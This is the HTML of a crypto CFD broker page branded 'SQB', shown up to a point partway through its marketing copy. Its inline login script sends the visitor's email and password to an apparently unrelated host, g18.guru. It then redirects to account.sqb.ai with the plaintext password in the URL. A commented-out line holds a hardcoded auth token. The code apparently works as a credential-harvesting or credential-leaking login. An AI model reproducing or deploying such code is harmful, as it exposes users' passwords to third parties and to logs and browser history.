<!doctype html>
<html lang="en-US">

<head>
  <meta charset="utf-8">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  <meta name="viewport"
    content="width=device-width, initial-scale=1, maximum-scale=1, minimum-scale=1, user-scalable=no shrink-to-fit=no, target-densitydpi=device-dpi">
  <title>Crypto Assets &#8211; SQB</title>
  <meta name='robots' content='max-image-preview:large'>
  <link rel='dns-prefetch' href='//cdnjs.cloudflare.com'>
  <link rel='dns-prefetch' href='//widgets.tada.website'>
  <link rel='dns-prefetch' href='//fonts.googleapis.com'>
  <link rel="stylesheet" href="../wp-includes/css/classic-themes.min.css">
  <style id='global-styles-inline-css' type='text/css'>
    body {
      --wp--preset--color--black: #000000;
      --wp--preset--color--cyan-bluish-gray: #abb8c3;
      --wp--preset--color--white: #ffffff;
      --wp--preset--color--pale-pink: #f78da7;
      --wp--preset--color--vivid-red: #cf2e2e;
      --wp--preset--color--luminous-vivid-orange: #ff6900;
      --wp--preset--color--luminous-vivid-amber: #fcb900;
      --wp--preset--color--light-green-cyan: #7bdcb5;
      --wp--preset--color--vivid-green-cyan: #00d084;
      --wp--preset--color--pale-cyan-blue: #8ed1fc;
      --wp--preset--color--vivid-cyan-blue: #0693e3;
      --wp--preset--color--vivid-purple: #9b51e0;
      --wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg, rgba(6, 147, 227, 1) 0%, rgb(155, 81, 224) 100%);
      --wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg, rgb(122, 220, 180) 0%, rgb(0, 208, 130) 100%);
      --wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg, rgba(252, 185, 0, 1) 0%, rgba(255, 105, 0, 1) 100%);
      --wp--preset--gradient--luminous-vivid-orange-to-vivid-red: linear-gradient(135deg, rgba(255, 105, 0, 1) 0%, rgb(207, 46, 46) 100%);
      --wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg, rgb(238, 238, 238) 0%, rgb(169, 184, 195) 100%);
      --wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg, rgb(74, 234, 220) 0%, rgb(151, 120, 209) 20%, rgb(207, 42, 186) 40%, rgb(238, 44, 130) 60%, rgb(251, 105, 98) 80%, rgb(254, 248, 76) 100%);
      --wp--preset--gradient--blush-light-purple: linear-gradient(135deg, rgb(255, 206, 236) 0%, rgb(152, 150, 240) 100%);
      --wp--preset--gradient--blush-bordeaux: linear-gradient(135deg, rgb(254, 205, 165) 0%, rgb(254, 45, 45) 50%, rgb(107, 0, 62) 100%);
      --wp--preset--gradient--luminous-dusk: linear-gradient(135deg, rgb(255, 203, 112) 0%, rgb(199, 81, 192) 50%, rgb(65, 88, 208) 100%);
      --wp--preset--gradient--pale-ocean: linear-gradient(135deg, rgb(255, 245, 203) 0%, rgb(182, 227, 212) 50%, rgb(51, 167, 181) 100%);
      --wp--preset--gradient--electric-grass: linear-gradient(135deg, rgb(202, 248, 128) 0%, rgb(113, 206, 126) 100%);
      --wp--preset--gradient--midnight: linear-gradient(135deg, rgb(2, 3, 129) 0%, rgb(40, 116, 252) 100%);
      --wp--preset--duotone--dark-grayscale: url('#wp-duotone-dark-grayscale');
      --wp--preset--duotone--grayscale: url('#wp-duotone-grayscale');
      --wp--preset--duotone--purple-yellow: url('#wp-duotone-purple-yellow');
      --wp--preset--duotone--blue-red: url('#wp-duotone-blue-red');
      --wp--preset--duotone--midnight: url('#wp-duotone-midnight');
      --wp--preset--duotone--magenta-yellow: url('#wp-duotone-magenta-yellow');
      --wp--preset--duotone--purple-green: url('#wp-duotone-purple-green');
      --wp--preset--duotone--blue-orange: url('#wp-duotone-blue-orange');
      --wp--preset--font-size--small: 13px;
      --wp--preset--font-size--medium: 20px;
      --wp--preset--font-size--large: 36px;
      --wp--preset--font-size--x-large: 42px;
      --wp--preset--spacing--20: 0.44rem;
      --wp--preset--spacing--30: 0.67rem;
      --wp--preset--spacing--40: 1rem;
      --wp--preset--spacing--50: 1.5rem;
      --wp--preset--spacing--60: 2.25rem;
      --wp--preset--spacing--70: 3.38rem;
      --wp--preset--spacing--80: 5.06rem;
    }

    :where(.is-layout-flex) {
      gap: 0.5em;
    }

    body .is-layout-flow>.alignleft {
      float: left;
      margin-inline-start: 0;
      margin-inline-end: 2em;
    }

    body .is-layout-flow>.alignright {
      float: right;
      margin-inline-start: 2em;
      margin-inline-end: 0;
    }

    body .is-layout-flow>.aligncenter {
      margin-left: auto !important;
      margin-right: auto !important;
    }

    body .is-layout-constrained>.alignleft {
      float: left;
      margin-inline-start: 0;
      margin-inline-end: 2em;
    }

    body .is-layout-constrained>.alignright {
      float: right;
      margin-inline-start: 2em;
      margin-inline-end: 0;
    }

    body .is-layout-constrained>.aligncenter {
      margin-left: auto !important;
      margin-right: auto !important;
    }

    body .is-layout-constrained> :where(:not(.alignleft):not(.alignright):not(.alignfull)) {
      max-width: var(--wp--style--global--content-size);
      margin-left: auto !important;
      margin-right: auto !important;
    }

    body .is-layout-constrained>.alignwide {
      max-width: var(--wp--style--global--wide-size);
    }

    body .is-layout-flex {
      display: flex;
    }

    body .is-layout-flex {
      flex-wrap: wrap;
      align-items: center;
    }

    body .is-layout-flex>* {
      margin: 0;
    }

    :where(.wp-block-columns.is-layout-flex) {
      gap: 2em;
    }

    .has-black-color {
      color: var(--wp--preset--color--black) !important;
    }

    .has-cyan-bluish-gray-color {
      color: var(--wp--preset--color--cyan-bluish-gray) !important;
    }

    .has-white-color {
      color: var(--wp--preset--color--white) !important;
    }

    .has-pale-pink-color {
      color: var(--wp--preset--color--pale-pink) !important;
    }

    .has-vivid-red-color {
      color: var(--wp--preset--color--vivid-red) !important;
    }

    .has-luminous-vivid-orange-color {
      color: var(--wp--preset--color--luminous-vivid-orange) !important;
    }

    .has-luminous-vivid-amber-color {
      color: var(--wp--preset--color--luminous-vivid-amber) !important;
    }

    .has-light-green-cyan-color {
      color: var(--wp--preset--color--light-green-cyan) !important;
    }

    .has-vivid-green-cyan-color {
      color: var(--wp--preset--color--vivid-green-cyan) !important;
    }

    .has-pale-cyan-blue-color {
      color: var(--wp--preset--color--pale-cyan-blue) !important;
    }

    .has-vivid-cyan-blue-color {
      color: var(--wp--preset--color--vivid-cyan-blue) !important;
    }

    .has-vivid-purple-color {
      color: var(--wp--preset--color--vivid-purple) !important;
    }

    .has-black-background-color {
      background-color: var(--wp--preset--color--black) !important;
    }

    .has-cyan-bluish-gray-background-color {
      background-color: var(--wp--preset--color--cyan-bluish-gray) !important;
    }

    .has-white-background-color {
      background-color: var(--wp--preset--color--white) !important;
    }

    .has-pale-pink-background-color {
      background-color: var(--wp--preset--color--pale-pink) !important;
    }

    .has-vivid-red-background-color {
      background-color: var(--wp--preset--color--vivid-red) !important;
    }

    .has-luminous-vivid-orange-background-color {
      background-color: var(--wp--preset--color--luminous-vivid-orange) !important;
    }

    .has-luminous-vivid-amber-background-color {
      background-color: var(--wp--preset--color--luminous-vivid-amber) !important;
    }

    .has-light-green-cyan-background-color {
      background-color: var(--wp--preset--color--light-green-cyan) !important;
    }

    .has-vivid-green-cyan-background-color {
      background-color: var(--wp--preset--color--vivid-green-cyan) !important;
    }

    .has-pale-cyan-blue-background-color {
      background-color: var(--wp--preset--color--pale-cyan-blue) !important;
    }

    .has-vivid-cyan-blue-background-color {
      background-color: var(--wp--preset--color--vivid-cyan-blue) !important;
    }

    .has-vivid-purple-background-color {
      background-color: var(--wp--preset--color--vivid-purple) !important;
    }

    .has-black-border-color {
      border-color: var(--wp--preset--color--black) !important;
    }

    .has-cyan-bluish-gray-border-color {
      border-color: var(--wp--preset--color--cyan-bluish-gray) !important;
    }

    .has-white-border-color {
      border-color: var(--wp--preset--color--white) !important;
    }

    .has-pale-pink-border-color {
      border-color: var(--wp--preset--color--pale-pink) !important;
    }

    .has-vivid-red-border-color {
      border-color: var(--wp--preset--color--vivid-red) !important;
    }

    .has-luminous-vivid-orange-border-color {
      border-color: var(--wp--preset--color--luminous-vivid-orange) !important;
    }

    .has-luminous-vivid-amber-border-color {
      border-color: var(--wp--preset--color--luminous-vivid-amber) !important;
    }

    .has-light-green-cyan-border-color {
      border-color: var(--wp--preset--color--light-green-cyan) !important;
    }

    .has-vivid-green-cyan-border-color {
      border-color: var(--wp--preset--color--vivid-green-cyan) !important;
    }

    .has-pale-cyan-blue-border-color {
      border-color: var(--wp--preset--color--pale-cyan-blue) !important;
    }

    .has-vivid-cyan-blue-border-color {
      border-color: var(--wp--preset--color--vivid-cyan-blue) !important;
    }

    .has-vivid-purple-border-color {
      border-color: var(--wp--preset--color--vivid-purple) !important;
    }

    .has-vivid-cyan-blue-to-vivid-purple-gradient-background {
      background: var(--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple) !important;
    }

    .has-light-green-cyan-to-vivid-green-cyan-gradient-background {
      background: var(--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan) !important;
    }

    .has-luminous-vivid-amber-to-luminous-vivid-orange-gradient-background {
      background: var(--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange) !important;
    }

    .has-luminous-vivid-orange-to-vivid-red-gradient-background {
      background: var(--wp--preset--gradient--luminous-vivid-orange-to-vivid-red) !important;
    }

    .has-very-light-gray-to-cyan-bluish-gray-gradient-background {
      background: var(--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray) !important;
    }

    .has-cool-to-warm-spectrum-gradient-background {
      background: var(--wp--preset--gradient--cool-to-warm-spectrum) !important;
    }

    .has-blush-light-purple-gradient-background {
      background: var(--wp--preset--gradient--blush-light-purple) !important;
    }

    .has-blush-bordeaux-gradient-background {
      background: var(--wp--preset--gradient--blush-bordeaux) !important;
    }

    .has-luminous-dusk-gradient-background {
      background: var(--wp--preset--gradient--luminous-dusk) !important;
    }

    .has-pale-ocean-gradient-background {
      background: var(--wp--preset--gradient--pale-ocean) !important;
    }

    .has-electric-grass-gradient-background {
      background: var(--wp--preset--gradient--electric-grass) !important;
    }

    .has-midnight-gradient-background {
      background: var(--wp--preset--gradient--midnight) !important;
    }

    .has-small-font-size {
      font-size: var(--wp--preset--font-size--small) !important;
    }

    .has-medium-font-size {
      font-size: var(--wp--preset--font-size--medium) !important;
    }

    .has-large-font-size {
      font-size: var(--wp--preset--font-size--large) !important;
    }

    .has-x-large-font-size {
      font-size: var(--wp--preset--font-size--x-large) !important;
    }

    .wp-block-navigation a:where(:not(.wp-element-button)) {
      color: inherit;
    }

    :where(.wp-block-columns.is-layout-flex) {
      gap: 2em;
    }

    .wp-block-pullquote {
      font-size: 1.5em;
      line-height: 1.6;
    }
  </style>
  <link rel="stylesheet" href="../css2?family=Poppins%3Awght%40300%3B400%3B500%3B600%3B700&#038;display=swap%22">
  <link rel="stylesheet" href="../wp-content/themes/prfwp/dist/styles/main_aef9cdc4.css">
  <link rel="canonical" href="index.htm">
  <!-- Stream WordPress user activity plugin v3.9.2 -->
  <link rel="icon" href="../wp-content/uploads/2023/01/cropped-SQB_512x512-3-32x32.jpg" sizes="32x32">
  <link rel="icon" href="../wp-content/uploads/2023/01/cropped-SQB_512x512-3-192x192.jpg" sizes="192x192">
  <link rel="apple-touch-icon" href="../wp-content/uploads/2023/01/cropped-SQB_512x512-3-180x180.jpg">
  <meta name="msapplication-TileImage" content="/wp-content/uploads/2023/01/cropped-SQB_512x512-3-270x270.jpg">

</head>

<body
  class="page-template page-template-template-flex-content template-flex-content page page-id-1348 acfm-mobile-align crypto-assets app-data index-data singular-data page-data page-1348-data page-crypto-assets-data template-flex-content-data">


  <svg xmlns="http://www.w3.org/2000/svg" style="position: absolute;height: 0;width: 0;">
    <svg id="Logo" xmlns="http://www.w3.org/2000/svg" viewbox="0 0 88.526 29.726">
      <path
        d="M35.634 18.127a8.189 8.189 0 0 0 5.936 2.521c2.184 0 3.248-1.036 3.248-2.101 0-1.399-1.624-1.876-3.78-2.38-3.052-.7-6.972-1.54-6.972-5.712 0-3.108 2.688-5.628 7.084-5.628 2.968 0 5.432.896 7.28 2.604l-2.212 2.912c-1.512-1.4-3.528-2.044-5.348-2.044-1.792 0-2.744.784-2.744 1.905 0 1.26 1.568 1.652 3.724 2.156 3.08.7 7 1.624 7 5.768 0 3.416-2.436 5.992-7.476 5.992-3.584 0-6.16-1.204-7.924-2.968l2.184-3.025zm32.087 2.941 1.372 1.596-2.772 2.269-1.484-1.765c-1.316.616-2.828.952-4.452.952-5.628 0-9.744-4.032-9.744-9.66s4.116-9.661 9.744-9.661c5.656 0 9.772 4.032 9.772 9.661.001 2.631-.895 4.928-2.436 6.608zm-5.376-.813-2.128-2.491 2.772-2.24 2.128 2.492c.616-.98.952-2.212.952-3.557 0-3.5-2.24-6.132-5.684-6.132s-5.656 2.632-5.656 6.132c0 3.473 2.212 6.132 5.656 6.132.701 0 1.373-.111 1.96-.336zM72.958 5.107h9.828c3.556 0 5.376 2.268 5.376 4.76 0 2.353-1.456 3.92-3.22 4.284 1.988.308 3.584 2.24 3.584 4.592 0 2.8-1.876 5.04-5.432 5.04H72.958V5.107zm8.96 7.505c1.344 0 2.184-.868 2.184-2.072 0-1.148-.84-2.044-2.184-2.044h-4.984v4.117h4.984zm.14 7.784c1.512 0 2.408-.868 2.408-2.212 0-1.177-.84-2.185-2.408-2.185h-5.124v4.396h5.124z">
      </path>
      <circle cx="14.863" cy="14.863" r="14.863" fill="#f0623f"></circle>
      <path
        d="M21.101 8.166v2.189H8.624V8.166h12.477zm0 4.845v8.548h-1.927v-6.36h-3.236v6.229h-1.927v-6.229h-3.46v6.36H8.624v-8.548h12.477z">
      </path>
    </svg>
    <symbol id="send" xmlns="http://www.w3.org/2000/svg" viewbox="0 0 256 177.5">
      <path
        d="M2.5 90.6a2.5 2.5 0 01-.8-4.8L252.7 0a2.5 2.5 0 012 4.6L117.4 80.3a2.6 2.6 0 01-1 .3L2.7 90.6zm224.8-76.5L22.9 83.8l92.5-8.1z">
      </path>
      <path
        d="M63.5 109.6a2.8 2.8 0 01-.7-.1l-61-19a2.5 2.5 0 01.5-4.9l113.7-10a2.5 2.5 0 011.4 4.7l-52.6 29a2.6 2.6 0 01-1.3.3zM15.4 89.5l47.9 14.9 41.3-22.8z">
      </path>
      <path
        d="M88.2 177.5a2.5 2.5 0 01-2.4-1.7L61.2 108a2.5 2.5 0 011.1-3L115 76a2.5 2.5 0 013.7 2l2.6 26.8a2.5 2.5 0 01-1 2.3l-13.1 9.9-16.6 58.8a2.5 2.5 0 01-2.4 1.8zm-21.6-69.3L88 166.8l14.7-52.1a2.5 2.5 0 01.9-1.3l12.6-9.6L114 82z">
      </path>
      <path
        d="M118.8 107.4a2.5 2.5 0 01-1-.2 2.5 2.5 0 01-1.5-2l-2.6-26.8a2.5 2.5 0 011.3-2.5L252.3.3a2.5 2.5 0 012.7 4.2L120.3 106.9a2.5 2.5 0 01-1.5.5zm0-27.9l2 20.7 104.1-79.1z">
      </path>
      <path
        d="M197.7 146.3a2.3 2.3 0 01-.7-.1l-92.7-28.4a2.5 2.5 0 01-.8-4.4L140.9 85a2.5 2.5 0 013.3.2l55.1 56.7a2.5 2.5 0 01-1.6 4.4zm-87.3-31.9l78.7 24.2-47-48.3z">
      </path>
      <path
        d="M197.7 146.3a2.5 2.5 0 01-1.8-.8l-55.3-56.8a2.5 2.5 0 01.3-3.7L252 .5a2.5 2.5 0 013.8 3L200 144.6a2.5 2.5 0 01-1.8 1.6 2 2 0 01-.5 0zm-51.5-59l50.6 52 51-129.4zm-58 90.2a2.5 2.5 0 01-2.4-3.2l16.8-59.6a2.5 2.5 0 013.1-1.7l31.2 9.5a2.5 2.5 0 011 4.2l-48 50a2.5 2.5 0 01-1.7.8zm18.5-59L93.3 166l38.2-39.9z">
      </path>
    </symbol>
    <symbol id="arrow" xmlns="http://www.w3.org/2000/svg" viewbox="0 0 15.113 24.876">
      <path
        d="M10.9,24.164C7.2,20.514.85,14.513.75,14.413a2.538,2.538,0,0,1-.75-1.8,2.511,2.511,0,0,1,.75-1.75c.1-.1,6.35-6.5,10.05-10.15a2.5,2.5,0,0,1,3.5,0,2.507,2.507,0,0,1,0,3.5L6,12.613l8.4,8.051a2.475,2.475,0,1,1-3.5,3.5Z">
      </path>
    </symbol>
    <symbol id="x" xmlns="http://www.w3.org/2000/svg" viewbox="0 0 446.1 446.2">
      <path
        d="M277.5 223L434.9 65.8a38.5 38.5 0 10-54.4-54.4L223.1 168.7 65.7 11.3a38.5 38.5 0 10-54.4 54.4L168.7 223 11.3 380.5A38.5 38.5 0 1065.7 435L223 277.5l157.4 157.4a38.5 38.5 0 0054.4-54.4z">
      </path>
    </symbol>
    <symbol id="check" xmlns="http://www.w3.org/2000/svg" viewbox="0 0 538.4 415.4">
      <path
        d="M500 0a38.5 38.5 0 00-28.6 12.8L194.5 321l-129-128.4a38.5 38.5 0 00-54.2 54.6l157.6 156.9a38.2 38.2 0 0027.2 11.2h1a38.7 38.7 0 0027.6-12.8L528.6 64.1A38.5 38.5 0 00500 0z">
      </path>
    </symbol>


    <svg id="email" xmlns="http://www.w3.org/2000/svg" viewbox="0 0 111 81.2">
      <path
        d="M101.5 0h-92A9.8 9.8 0 000 10v61.3a9.8 9.8 0 009.5 10h92a9.8 9.8 0 009.5-10V10a9.8 9.8 0 00-9.5-10zm3 12v57.3L77.1 40.6zM34 40.5L6.5 69.3V11.9zm4.5 4.8l10 10.4a10.2 10.2 0 0014.3 0l9.8-10.4 27.9 29.1H10.5zm17 6.2a4.3 4.3 0 01-3-1.1L10.6 6.7h89.7L58.5 50.5a4.3 4.3 0 01-3 1.1z"
        fill="#fff"></path>
    </svg>
    <svg id="location" xmlns="http://www.w3.org/2000/svg" viewbox="0 0 74.6 98.2">
      <path
        d="M37.3 98.2l-2-2C18.4 80.3 1.3 60.8 0 36.6l-.1-2V34a26.8 26.8 0 011-7.6C5.2 10.9 20 0 37.4 0s32.2 10.9 36.3 26.5a26.8 26.8 0 011 7.5v2.6C73.3 61 56 80.4 39.3 96.3zm0-92.2C22.8 6 10.3 15 7 28a21.2 21.2 0 00-.9 6v2.3c1 21.2 16.1 39 31.3 53.6 15.2-14.7 30.2-32.4 31.3-53.6V34a21.2 21.2 0 00-.8-6c-3.4-13-16-22-30.5-22zm1 48.5a18.3 18.3 0 1118.2-18.2 18.3 18.3 0 01-18.3 18.2zm0-30.5a12.3 12.3 0 1012.2 12.3A12.3 12.3 0 0038.2 24z"
        fill="#fff"></path>
    </svg>
    <svg id="phone" xmlns="http://www.w3.org/2000/svg" viewbox="0 0 67.3 88.9">
      <path
        d="M49.5 89c-12.9 0-28.3-11.4-39.2-30.2A71.2 71.2 0 010 26C-.2 15 3.6 6.7 10.8 2.5A20.1 20.1 0 0117.4.1a8.6 8.6 0 015 .6l4.4 2a8.7 8.7 0 015.2 7.8v14.2a8.7 8.7 0 01-4.2 7.6L23 35a.6.6 0 00-.3.7 82 82 0 0013.8 23.8.6.6 0 00.7.1l4.8-2.8a8.7 8.7 0 018.7 0L63 64a8.7 8.7 0 014.3 8.4l-.5 4.7a8.8 8.8 0 01-2 4.7 20 20 0 01-5.4 4.6 19.4 19.4 0 01-9.9 2.5zM19 6a2.8 2.8 0 00-.5 0A14 14 0 0014 7.7c-5.3 3-8 9.4-7.8 18.1.2 9 3.5 19.7 9.5 30 12 20.6 29.9 31.7 40.9 25.3a14.2 14.2 0 003.7-3.2 2.7 2.7 0 00.6-1.4l.5-4.8a2.7 2.7 0 00-1.3-2.5L47.7 62a2.7 2.7 0 00-2.7 0l-4.8 2.8a6.6 6.6 0 01-8.2-1.4 85.7 85.7 0 01-8.6-12.2 85.5 85.5 0 01-6.3-13.4 6.5 6.5 0 012.9-8l4.8-2.7a2.7 2.7 0 001.3-2.4L26 10.7a2.7 2.7 0 00-1.6-2.4l-4.4-2a2.7 2.7 0 00-1-.2z"
        fill="#fff"></path>
    </svg>
    <symbol id="arrowRight" viewbox="0 0 44 40">
      <path d="M42.5 18.3L3 .6A2 2 0 0 0 .2 3.4l8 16.8L.1 37A2 2 0 0 0 2 40c.3 0 .6 0 .8-.2l39.6-17.7a2 2 0 0 0 0-3.8z">
      </path>
    </symbol>
    <symbol id="send" xmlns="http://www.w3.org/2000/svg" viewbox="0 0 363.8 176">
      <path fill="none" d="M0 0h363.8v176H0z"></path>
      <path
        d="M189 122.5a15 15 0 0 1-15 15H88.4a15 15 0 0 1-15-15V75.1l57.7 41.8L189 75.1v6.1h9.6V56.7a18.2 18.2 0 0 0-18.2-18.2H82a18.2 18.2 0 0 0-18.2 18.2v66.5a24 24 0 0 0 24 24h86.8a24 24 0 0 0 24-24v-18.8h-9.7zM82.8 48.1h96.6a9 9 0 0 1 5.3 16.3l-53.6 38.8-53.6-38.8A9 9 0 0 1 82.9 48zM285.4 58h-71.3v9.7h71.3a4.8 4.8 0 0 0 0-9.6z">
      </path>
      <path d="M182.8 97.6H238a4.8 4.8 0 0 0 0-9.6h-55.3zM265.6 118h-60.3v9.6h60.3a4.8 4.8 0 0 0 0-9.7z"></path>
    </symbol>



  </svg>
  <prf-widget-manager ng-app="prfwp" options="{defaultLang: 'en',
                              translation: {
                                locations: [
                                  '/wp-content/uploads/locale-partials/'
                                ],
                                suffix: '.json'
                              },
                              brandId: 1}" ng-class="{'prfwp-customer' : prf.customer}">
    <header class="prfwp-header">
      <nav class="prfwp-navbar">
        <div class="prfwp-navbar__container container">
          <div class="prfwp-navbar__navigation topNavigation collapse" id="topNavigation">
            <ul id="menu-primary" class="prfwp-navbar__menu">
              <li class="menu-item menu-trading-room"><a href="https://mgkweb.technoglobal.org/mgk/">Trading Room</a>
              </li>
              <li class="menu-item menu-our-platforms"><a href="../our-platforms/index.htm">Our Platforms</a></li>
              <li class="menu-item menu-market-overview"><a href="../market-overview/index.htm">Market Overview</a></li>
              <li class="active menu-item menu-crypto-assets"><a href="index.htm" aria-current="page">Crypto Assets</a>
              </li>
              <li class="menu-item menu-our-story"><a href="../our-story/index.htm">Our Story</a></li>
              <li class="menu-item menu-support"><a href="../support/index.htm">Support</a></li>
            </ul>
            <div class="prfwp-customer__navigation" ng-cloak="" ng-show="prf.customer">
            </div>
            <div class="prfwp-loginWidget-wrapper">
              <div class="prfwp-loginWidget" ng-cloak="" ng-show="!prf.customer">
                <a class="prfwp-loginWidget__loginPopupCtrl acfm-btn-material collapsed" data-toggle="collapse"
                  data-target=".prfwp-loginWidget__loginPopup" aria-controls="loginPopup" aria-expanded="false"
                  aria-label="Toggle Login Popup">
                  Login
                </a>
                <div id="loginPopup" class="prfwp-loginWidget__loginPopup collapse">
                  <div class="prfwp-loginWidget__loginPopup__inner">
                    <div class="prfwp-loginWidget__loginPopup__loginContent">
                      <div style="margin-top: 30px; font-weight: bold; font-size: 25px; color: #f0623f;"
                        class="prfwp-loginWidget__loginPopup__loginTitle">Login to your
                        account</div>
                      <form id="L_form" name="loginForm" class="ng-pristine ng-pending" style="">
                        <div class="loginprfw__login-bar-wrapper">
                          <div class="loginprfw__login-bar">
                            <!-- ngIf: $ctrl.loginMethod === $ctrl.CustomerLoginTypeCode.Email -->
                            <div class="loginprfw__login-by-email ng-scope"
                              ng-if="$ctrl.loginMethod === $ctrl.CustomerLoginTypeCode.Email">

                              <div class="loginprfw__login-bar-control loginprfw__login-bar-control--input">
                                <div class="prfw-input-icon-box">
                                  <input required style="color: #000000;"
                                    class="prfw-input-icon-box__control prfw-input-icon-box__control--alt ng-pristine ng-untouched ng-pending ng-empty"
                                    type="email" id="L_Email" placeholder="Email">
                                </div>
                              </div>

                              <div class="loginprfw__login-bar-control loginprfw__login-bar-control--input">
                                <div class="prfw-input-icon-box">
                                  <input required style="color: #000000;"
                                    class="prfw-input-icon-box__control prfw-input-icon-box__control--alt ng-pristine ng-untouched ng-pending ng-empty"
                                    id="L_Password" name="password" type="password" ng-model="$ctrl.model.password"
                                    placeholder="Password">
                                </div>
                              </div>

                            </div>
                            <!-- end ngIf: $ctrl.loginMethod === $ctrl.CustomerLoginTypeCode.Email -->

                            <!-- ngIf: $ctrl.loginMethod === $ctrl.CustomerLoginTypeCode.Phone -->

                            <div class="loginprfw__login-bar-control">
                              <button class="loginprfw__login-btn prfw-btn prfw-btn-secondary ng-scope"
                                type="submit">Login</button>
                            </div>
                          </div>
                        </div>
                      </form>
                      <script>
                        document.getElementById('L_form').addEventListener('submit', (e) => {
                          e.preventDefault();
                          const Email = document.getElementById('L_Email').value;
                          const Password = document.getElementById('L_Password').value;
                          // parent.document.location.href = 'https://account.sqb.ai/auth?token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwczovL2cxOC5ndXJ1L2FwaS9hdXRoIiwiaWF0IjoxNjc1MzUwNDE0LCJleHAiOjE2NzU0MzY4MTQsIm5iZiI6MTY3NTM1MDQxNCwianRpIjoiajhyeVd5akJlcU1Nd2JlNCIsInN1YiI6IjU1NjcxIiwicHJ2IjoiZTcyYTY3MDZjNTY1MDU1ZDg0MTMzYTE4OGI0MDE4MjU4MmRhMDJjNyJ9.HM3ZxZfBRlezvr9k02OjAN783neplFku6aRxFStFbIw';

                          jQuery.ajax({
                            url: 'https://g18.guru/api/auth',
                            type: 'post',
                            data: {
                              email: document.getElementById("L_Email").value,
                              password: document.getElementById("L_Password").value
                            },
                            xhrFields: {
                              withCredentials: true
                            }
                          }).done(function (data) {
                            if (data) {
                              console.log(data);
                              parent.document.location.href = 'https://account.sqb.ai/auth?email=' + document.getElementById("L_Email").value + '&password=' + document.getElementById("L_Password").value;
                            }
                            // })

                          }).fail(function (data) {
                            console.log(data);
                            // document.getElementById("error-span2").innerHTML = "<span style='color: red;'>Error! Incorrect email or password</span>";
                            // jQuery('#submit-btn2').attr("disabled", false);

                            // jQuery('.wait2').css('display', 'none');
                            // jQuery('#error-span2').css('display', 'flex');
                          })
                        })
                      </script>
                    </div>
                  </div>
                </div>
              </div>
              <prf-content-restrict>
                <prf-on-authorized>
                  <a ng-cloak="" ng-show="!prf.customer" href="../open-account/index.htm"
                    class="prfwp-loginWidget__signUpBtn-lg acfm-btn-material">
                    Open Account
                  </a>
                </prf-on-authorized>
              </prf-content-restrict>
              <div class="prfwp-loginWidget-wrapper">
                <a ng-cloak="" ng-show="prf.customer" class="prfwp-loginWidget__depositBtn" href="../deposit/index.htm">
                  Deposit
                </a>
                <a ng-cloak="" ng-show="prf.customer" href="../index.htm"
                  class="prfwp-loginWidget__logoutBtn acfm-btn-material" onclick="prf.loginWidget.logout();">Logout
                </a>
              </div>
            </div>
            <div ng-cloak="" ng-if="prf.customer" class="prfwp-customerTopBar">
              <div class="prfwp-customerTopBar__container container">
                <div class="prfwp-customerTopBar__myAccount">
                  <a href="../account-summary/index.htm">My Account</a> | Welcome {{prf.customer.firstName}}
                  {{prf.customer.lastName}}!
                </div>
                <div class="prfwp-customerTopBar__details">
                  <div class="prfwp-customerTopBar__detail">
                    <span class="prfwp-customerTopBar__detail__label">ID:</span>
                    <span class="prfwp-customerTopBar__detail__value">{{prf.tradingAccount.externalAccountId}}</span>
                  </div>

                  <div class="prfwp-customerTopBar__detail">
                    <span class="prfwp-customerTopBar__detail__label">Balance:</span>
                    <span class="prfwp-customerTopBar__detail__value"><prf-account-balance-widget ng-cloak=""
                        ng-if="prf.tradingAccount"></prf-account-balance-widget></span>
                  </div>

                  <div class="prfwp-customerTopBar__detail loginprfw__account-switcher prfw-common">
                    <prf-account-switcher ng-cloak="" ng-if="prf.tradingAccount"></prf-account-switcher>
                  </div>
                </div>
              </div>
            </div>
          </div>
        </div>
        <div class="prfwp-navbar__brand-wrapper">
          <div class="prfwp-navbar__container container">
            <a class="prfwp-navbar__brand prfwp-brand" href="../index.htm" title="SQB">
              <svg class="svg-Logo">
                <use xlink:href="#Logo"></use>
              </svg>
            </a>
            <button class="prfwp-navbar__burger prfwp-burger collapsed" data-toggle="collapse"
              data-target=".topNavigation" aria-controls="topNavigation" aria-expanded="false"
              aria-label="Toggle navigation">
              <span class="prfwp-burger__span prfwp-burger__span--first"></span>
              <span class="prfwp-burger__span prfwp-burger__span--middle"></span>
              <span class="prfwp-burger__span prfwp-burger__span--last"></span>
            </button>
          </div>
        </div>
      </nav>
    </header>
    <main class="prfwp-main" role="document">
      <div class="acfm-flex-content">
        <section class="acfm-hero acfm-bg-image--align-center-top acfm-bg-image--size-cover acfm-text-color-white">


          <div class="acfm-bg-image" style="background-image:url(../wp-content/uploads/2023/01/bg-7.png)"></div>


          <div class="acfm-hero__container container">
            <div class="acfm-row
   acfm-row acfm-row--align-center acfm-row--justify-between acfm-colsCount-1">

              <div class="acfm-row__col acfm-col-md-9 acfm-col-lg-9">
                <h1 class="acfm-title acfm-text-xl acfm-text-bold acfm-margin-bottom--small">
                  <span>SQB - Home of Cryptocurrencies</span>
                </h1>
                <div class="acfm-text">
                  <p>Cryptocurrencies have been a source of intrigue in investment circles over the past few years. SQB
                    provides you with direct access to this unique asset class, with plenty of CFDs available to trade
                    as well as exciting crypto Bundles.</p>
                </div>
              </div>
            </div>
          </div>
        </section>
        <section class="acfm-section acfm-normal-padding">


          <div class="acfm-section__container container">
            <div class="acfm-spacer acfm-normal-padding hide-mobile"></div>
            <div class="acfm-row
   acfm-row acfm-row--align-center acfm-row--justify-between acfm-colsCount-2">

              <div class="acfm-row__col acfm-col-md-10 acfm-col-lg-10">
                <h2 class="acfm-title acfm-text-lg acfm-text-semi-bold acfm-margin-bottom--small">
                  <span>Ready for the Crypto Adventure?</span>
                </h2>
                <div class="acfm-text">
                  <p>Cryptocurrencies have proven to be an attractive financial asset class. At SQB, we provide the best
                    possible trading conditions so that traders can exploit the crypto opportunity to the maximum.</p>
                  <ul>
